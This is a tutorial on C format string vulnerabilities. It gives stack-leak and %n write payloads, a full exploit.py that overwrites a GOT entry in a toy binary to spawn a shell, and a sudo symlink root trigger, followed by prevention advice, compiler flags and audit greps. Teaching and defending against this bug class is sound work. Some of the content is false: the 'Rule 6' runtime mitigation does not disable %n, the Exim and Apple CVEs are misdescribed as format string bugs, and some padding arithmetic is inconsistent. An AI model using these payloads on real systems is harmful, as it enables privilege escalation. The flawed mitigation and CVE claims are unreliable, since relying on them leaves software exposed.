Format String Vulnerabilities — The Read-Write Primitive Hiding in printf()

Format string vulnerabilities are unique in the exploit world. Most memory corruption bugs give you either a read or a write — buffer overflows write, out-of-bounds reads leak data. Format strings give you both. A single printf(user_input) call gives the attacker the ability to read arbitrary stack memory AND write to arbitrary memory addresses.

The fix is one of the simplest in all of security: use printf("%s", input) instead of printf(input). Yet format string bugs keep appearing in production code because developers don’t understand why the first form is dangerous.

How printf() Actually Works

To understand the vulnerability, you need to understand how variadic functions work in C.

printf is a variadic function — it accepts a variable number of arguments. The first argument is always the format string, which tells printf how many additional arguments to expect and how to interpret them:

printf("Name: %s, Age: %d, Balance: %.2f\n", name, age, balance);
//     ↑ format string                        ↑ 3 additional args

When printf encounters %s, it reads the next value from the stack (or register, depending on calling convention) and interprets it as a string pointer. When it encounters %d, it reads the next value as an integer.

The critical detail: printf has no way to verify how many arguments were actually passed. It trusts the format string completely. If the format string says “read 10 arguments,” printf reads 10 values from the stack — even if only 2 were passed.

// This compiles and runs without error:
printf("%x %x %x %x %x");  // No arguments provided

// printf reads 5 values off the stack
// Those values are whatever happens to be there — local variables,
// saved registers, return addresses, canaries, secrets...

How printf reads the stack

The Vulnerable Pattern

The vulnerability exists whenever user-controlled data is used as the format string:

// VULNERABLE — user controls the format string
char *user_input = get_user_input();
printf(user_input);           // Classic format string bug
fprintf(stderr, user_input);  // Same bug, different stream
sprintf(buffer, user_input);  // Same bug, writes to buffer
snprintf(buf, sz, user_input); // Still vulnerable to read/write
syslog(LOG_INFO, user_input); // Syslog uses printf internally

// SAFE — user input is an argument, not the format
printf("%s", user_input);           // Safe
fprintf(stderr, "%s", user_input);  // Safe
sprintf(buffer, "%s", user_input);  // Safe (but watch buffer overflow)
syslog(LOG_INFO, "%s", user_input); // Safe

The difference is one argument. That one argument is the difference between a normal string print and giving the attacker complete control over your program’s memory.

Attack Phase 1: Reading Stack Memory

The simplest format string attack — leak information from the stack.

Basic Stack Dump

#include <stdio.h>

void vulnerable(char *input) {
    char secret[] = "S3CR3T_K3Y";
    int admin_flag = 0;

    // VULNERABLE: user input as format string
    printf(input);
    printf("\n");
}

int main(int argc, char *argv[]) {
    if (argc > 1) vulnerable(argv[1]);
    return 0;
}

Compile without protections for learning:

gcc -m32 -fno-stack-protector -no-pie -z execstack -o vuln vuln.c

Now attack:

# Leak stack values as hex
$ ./vuln "%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
bffff5a0.00000001.0804a008.bffff798.08048460.bffff5c0.33524353.4b5f5433

# Last two values: 0x33524353 = "3RCS" and 0x4b5f5433 = "K_T3"
# That's "S3CR3T_K3Y" in little-endian chunks — the secret is leaked!

Each %08x reads one 4-byte value from the stack and prints it as hex. The attacker keeps adding specifiers until they’ve dumped enough of the stack to find interesting data.

Direct Parameter Access

Instead of dumping sequentially, %N$x reads the Nth argument directly:

# Read the 7th stack value directly
$ ./vuln "%7\$x"
33524353

# Read as string — might crash if value isn't a valid pointer
$ ./vuln "%7\$s"
S3CR3T_K3Y

This is more precise and allows targeted data extraction. The attacker finds which stack position contains their target, then extracts it directly.

Reading Arbitrary Memory Addresses

The attacker can read memory at any address by combining stack control with %s:

# Step 1: Find which stack position reflects our input
$ ./vuln "AAAA%6\$x"
AAAA41414141
# Position 6 contains our input (0x41414141 = "AAAA")

# Step 2: Replace AAAA with a target address, use %s to read it as a string
$ ./vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'\x10\xa0\x04\x08' + b'%6\$s')")
# Reads whatever string is stored at address 0x0804a010

This turns a format string bug into an arbitrary read — the attacker can read any readable memory address.

What Attackers Leak

Target	Why
Stack canary	Needed to bypass stack protector in buffer overflow
Return address	Reveals code section base (defeats PIE)
libc address	Reveals libc base (defeats ASLR for ROP chains)
Heap pointers	Useful for heap exploitation
Secrets/keys	API keys, encryption keys, session tokens stored in stack variables

Attack Phase 2: Writing to Memory

This is where format strings become truly dangerous. The %n specifier writes instead of reading.

int count;
printf("Hello%n World", &count);
// %n writes the number of bytes printed so far (5) into count
// count is now 5

In a format string attack, the attacker controls which address %n writes to and what value is written:

The %n write primitive

Building the Write Primitive

# Step 1: We know position 6 reflects our input (from the read phase)

# Step 2: Place target address in our input, use %n to write to it
# Target: 0x0804a010 (e.g., GOT entry for puts)
# We want to write the value 0xDEAD to this address

$ ./vuln $(python3 -c "
import struct
addr = struct.pack('<I', 0x0804a010)  # Target address
# %56944x pads output to 0xDEAD (57005 - 4 bytes already printed = 56901... adjusted)
payload = addr + b'%56901x%6\$n'
import sys; sys.stdout.buffer.write(payload)
")

The key insight: %n writes the number of bytes printed so far. By padding the output with %Nx (print N characters of padding), the attacker controls the written value.

Writing Large Values with Short Writes

Writing a full 4-byte address at once requires printing billions of characters. The practical approach uses %hn (half-word write) or %hhn (byte write):

%n   — writes 4 bytes (int)
%hn  — writes 2 bytes (short)
%hhn — writes 1 byte (char)

To write 0xDEADBEEF to address 0x0804a010:

Write 0xBEEF to 0x0804a010 (low 2 bytes)  using %hn
Write 0xDEAD to 0x0804a012 (high 2 bytes)  using %hn

Payload:
  [addr_low][addr_high]%[pad1]x%[pos1]$hn%[pad2]x%[pos2]$hn

Where:
  addr_low  = \x10\xa0\x04\x08  (0x0804a010)
  addr_high = \x12\xa0\x04\x08  (0x0804a012)
  pad1 = 0xBEEF - 8 = 48871     (adjust for already printed bytes)
  pad2 = 0xDEAD - 0xBEEF = 7870 (difference between values)

GOT Overwrite — The Classic Technique

The Global Offset Table (GOT) contains function pointers for dynamically linked functions. Overwriting a GOT entry redirects future calls to that function:

Before:
  printf@GOT → 0x7f12345678 (real printf in libc)

After format string write:
  printf@GOT → 0x7f12340010 (system() in libc)

Next time the program calls printf(user_input):
  → Actually calls system(user_input)
  → If user_input = "/bin/sh" → shell!

// Vulnerable program
void process(char *input) {
    printf(input);  // Format string bug
    printf("\n");   // After GOT overwrite, this calls system("\n")

    // Better attack: if there's a second printf with controlled input
    char cmd[100];
    fgets(cmd, 100, stdin);
    printf(cmd);    // Now calls system(cmd) → system("/bin/sh")
}

Complete Exploitation Walkthrough

Here’s a realistic exploitation scenario, step by step:

// target.c — vulnerable server that reads input and logs it
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void log_message(char *msg) {
    printf("[LOG] ");
    printf(msg);        // VULNERABLE
    printf("\n");
}

void admin_panel() {
    printf("ACCESS GRANTED — admin shell\n");
    system("/bin/sh");
}

int main() {
    char input[256];
    printf("Enter message: ");
    fgets(input, sizeof(input), stdin);
    input[strcspn(input, "\n")] = '\0';

    log_message(input);
    return 0;
}

# Compile with partial protections (no PIE, no RELRO for GOT write)
gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.c

Step 1: Find input offset

$ echo 'AAAA%6$x' | ./target
[LOG] AAAA41414141
# Input is at position 6

Step 2: Find admin_panel address

$ objdump -d target | grep admin_panel
0804852d <admin_panel>:

Step 3: Find a GOT entry to overwrite

$ objdump -R target | grep printf
0804a010 R_386_JUMP_SLOT   printf@GLIBC

Step 4: Write admin_panel address (0x0804852d) to printf@GOT (0x0804a010)

# exploit.py
import struct

got_printf_low  = struct.pack('<I', 0x0804a010)  # Low 2 bytes
got_printf_high = struct.pack('<I', 0x0804a012)  # High 2 bytes

# admin_panel = 0x0804852d
# Low half  = 0x852d = 34093
# High half = 0x0804 = 2052

# Payload: [addr1][addr2] = 8 bytes already printed
# Write 0x852d to low:  need to print 34093 - 8 = 34085 more chars
# Write 0x0804 to high: 0x10804 - 0x852d = 33495 more chars (wraps to 0x0804)

payload = got_printf_low + got_printf_high
payload += b'%34085x%6$hn'    # Write 0x852d to printf@GOT low
payload += b'%33495x%7$hn'    # Write 0x0804 to printf@GOT high

import sys
sys.stdout.buffer.write(payload + b'\n')

$ python3 exploit.py | ./target
[LOG] ... (lots of whitespace padding) ...
ACCESS GRANTED — admin shell
# Next printf(msg) actually calls admin_panel() → system("/bin/sh")

Exploitation chain

Format String Bugs in Modern Code

Format string bugs aren’t limited to ancient C code. They appear in:

Logging Libraries

// C — syslog
syslog(LOG_INFO, user_input);          // VULNERABLE
syslog(LOG_INFO, "%s", user_input);    // Safe

// C++ — still possible if wrapping printf
void log(const char *msg) {
    fprintf(logfile, msg);              // VULNERABLE
    fprintf(logfile, "%s", msg);        // Safe
}

C++ iostream vs printf

// iostream is inherently safe — no format specifiers
std::cout << user_input;  // Safe — always treats as data

// But C++ code often still uses printf for formatting
printf(user_input.c_str());  // VULNERABLE — same bug

Python — Not Immune

Python’s % operator doesn’t have %n, but format strings can still leak information:

# Python format string information disclosure
user_input = "{0.__class__.__mro__[1].__subclasses__()}"
print(user_input.format(some_object))
# Leaks all subclasses — used in template injection attacks

# f-strings evaluated at definition time — safe from injection
name = f"{user_input}"  # Safe — user_input is data, not format

# But str.format() with user-controlled format IS dangerous
template = user_input  # User provides: {config.secret_key}
template.format(config=app.config)  # Leaks secret_key!

Rust — Compile-Time Prevention

// Rust's format macros are checked at compile time
println!("{}", user_input);  // Safe — format is a literal

// This won't even compile:
// let fmt = user_input;
// println!(fmt);  // ERROR: format argument must be a string literal

Real-World Format String CVEs

Wu-FTPd (CVE-2000-0573)

One of the first widely exploited format string bugs. The FTP server passed user-supplied SITE EXEC arguments directly to a printf-like function. Remote root access on any system running Wu-FTPd.

sudo (CVE-2012-0809)

sudo version 1.8.0–1.8.3p1 had a format string vulnerability where the program name (argv[0]) was passed directly to a logging function using printf semantics. An attacker could create a symlink with format specifiers in the name:

ln -s /usr/bin/sudo '%n%n%n%n'
./'%n%n%n%n' /bin/sh  # Triggered format string write → root shell

Exim Mail Server (CVE-2019-15846)

Format string bug in Exim’s TLS SNI (Server Name Indication) handler. An attacker could send a crafted TLS ClientHello with format specifiers in the SNI field, achieving remote code execution as root on the mail server.

iOS/macOS (CVE-2021-1782, multiple)

Apple has had several format string vulnerabilities in system services over the years, usually in logging code that passes user-controlled data to os_log or NSLog without a format specifier.

Prevention — The Complete Guide

Rule 1: Never Pass User Input as a Format String

// The one rule that prevents 100% of format string vulnerabilities:
printf("%s", user_input);   // ALWAYS use a format specifier

// This applies to EVERY printf-family function:
printf("%s", msg);
fprintf(f, "%s", msg);
sprintf(buf, "%s", msg);
snprintf(buf, sz, "%s", msg);
syslog(pri, "%s", msg);
err(1, "%s", msg);
warn("%s", msg);

Rule 2: Compiler Warnings

GCC and Clang can detect most format string bugs at compile time:

# Enable format string warnings
gcc -Wformat -Wformat-security -Werror -o program program.c

# -Wformat: Check format string/argument type mismatches
# -Wformat-security: Warn when format string is not a literal
# -Werror: Treat warnings as errors (blocks compilation)

// With -Wformat-security, this triggers a warning:
printf(user_input);
// warning: format not a string literal and no format arguments [-Wformat-security]

Rule 3: GCC’s attribute((format))

For custom printf-like functions, annotate them so the compiler checks their format strings:

// Tell GCC: argument 1 is a printf format, arguments start at 2
void my_log(const char *fmt, ...) __attribute__((format(printf, 1, 2)));

void my_log(const char *fmt, ...) {
    va_list args;
    va_start(args, fmt);
    vfprintf(logfile, fmt, args);
    va_end(args);
}

// Now GCC checks format string at compile time:
my_log("%s logged in", username);     // OK
my_log(user_input);                   // WARNING
my_log("%d", "not an int");           // WARNING — type mismatch

Rule 4: Static Analysis

# Clang Static Analyzer
scan-build gcc -o program program.c

# CodeQL (GitHub's static analysis)
# Rule: cpp/non-constant-format
# Detects: printf-family calls with non-constant format strings

# Coverity
# CID: TAINTED_STRING
# Detects: User-tainted data flowing into format string position

# Flawfinder / rats
flawfinder --minlevel=3 program.c
# Reports all printf calls with non-literal format strings

Rule 5: FORTIFY_SOURCE

When compiled with -D_FORTIFY_SOURCE=2, glibc’s printf family rejects %n when the format string is in writable memory:

// With FORTIFY_SOURCE=2:
char fmt[] = "%s%n";      // Format in writable memory (stack/heap)
printf(fmt, str, &count); // *** %n in writable segment detected *** → abort

// Format in read-only memory (string literal) still works:
printf("%s%n", str, &count);  // OK — format is in .rodata

This doesn’t fix the information leak (%x/%p still work), but it prevents the write primitive.

Rule 6: Runtime Mitigations

// Disable %n entirely in glibc (environment variable)
setenv("LIBC_FATAL_STDERR_", "1", 1);

// Or at the OS level (systemd service):
// Environment=GLIBC_TUNABLES=glibc.cpu.hwcaps=-FSGSBASE

Format String vs Buffer Overflow

Dimension	Format String	Buffer Overflow
Cause	User input as format string	Missing bounds check on copy
Read primitive	Yes — `%x`, `%p`, `%s` leak stack	No (need separate info leak)
Write primitive	Yes — `%n` writes to memory	Yes — overwrite return addr/GOT
Precision	Can write exact values byte-by-byte	Overwrites everything in between
ASLR bypass	Built-in (leak with `%p`, write with `%n`)	Requires separate info leak
Stack canary bypass	Leak canary with `%x`, include in payload	Much harder — timing/brute force
Detection	Easy — `-Wformat-security` catches most	Harder — requires bounds analysis
Fix complexity	Trivial — add `"%s",`	Varies — may require redesign

The key advantage of format strings for attackers: they provide both read and write in a single vulnerability, making ASLR and stack canaries much easier to bypass than with buffer overflows alone.

Detection and Auditing

Grep Patterns for Code Review

# Find potentially vulnerable printf-family calls in C/C++ code
grep -rn 'printf\s*(' --include="*.c" --include="*.cpp" --include="*.h" | \
  grep -v 'printf\s*("' | \
  grep -v 'printf\s*("%'
# Shows printf calls where first arg is NOT a string literal

# Find syslog calls without format specifiers
grep -rn 'syslog\s*(' --include="*.c" | grep -v '"%'

# Find sprintf without literal format (also check for buffer overflow)
grep -rn 'sprintf\s*(' --include="*.c" | grep -v 'sprintf\s*([^,]*, *"'

Automated Testing

# Fuzz with format string payloads
echo '%x%x%x%x%x%x%x%x' | ./program
echo '%s%s%s%s%s%s%s%s' | ./program  # Likely crashes if vulnerable
echo '%n%n%n%n%n%n%n%n' | ./program  # Crashes = write works (FORTIFY stops this)
echo 'AAAA%p%p%p%p%p%p%p%p' | ./program  # Look for 0x41414141 in output

# If any of these produce unexpected output or crashes, investigate.

Security Checklist

CODE:
[ ] No printf-family call uses user input as format string
[ ] All custom logging functions use "%s" for user data
[ ] Custom printf-like functions have __attribute__((format))
[ ] No string concatenation to build format strings with user data
[ ] Python str.format() / f-strings don't use user-controlled templates

COMPILE:
[ ] -Wformat and -Wformat-security enabled
[ ] -Werror treats format warnings as errors
[ ] -D_FORTIFY_SOURCE=2 enabled (blocks %n in writable memory)
[ ] Static analysis runs in CI (CodeQL, Coverity, or clang-tidy)

RUNTIME:
[ ] ASLR enabled
[ ] Full RELRO (-Wl,-z,relro,-z,now) prevents GOT overwrite
[ ] PIE enabled (makes GOT address unpredictable)
[ ] Stack canaries enabled (-fstack-protector-strong)

REVIEW:
[ ] Code review checklist includes format string patterns
[ ] Grep audit for printf-family calls run before release
[ ] Fuzz testing includes format string payloads

Format string vulnerabilities are the easiest critical bug to prevent. One rule — printf("%s", input) — eliminates the entire class. Yet they keep appearing because developers don’t understand what printf(input) actually does at the machine level. Now you do.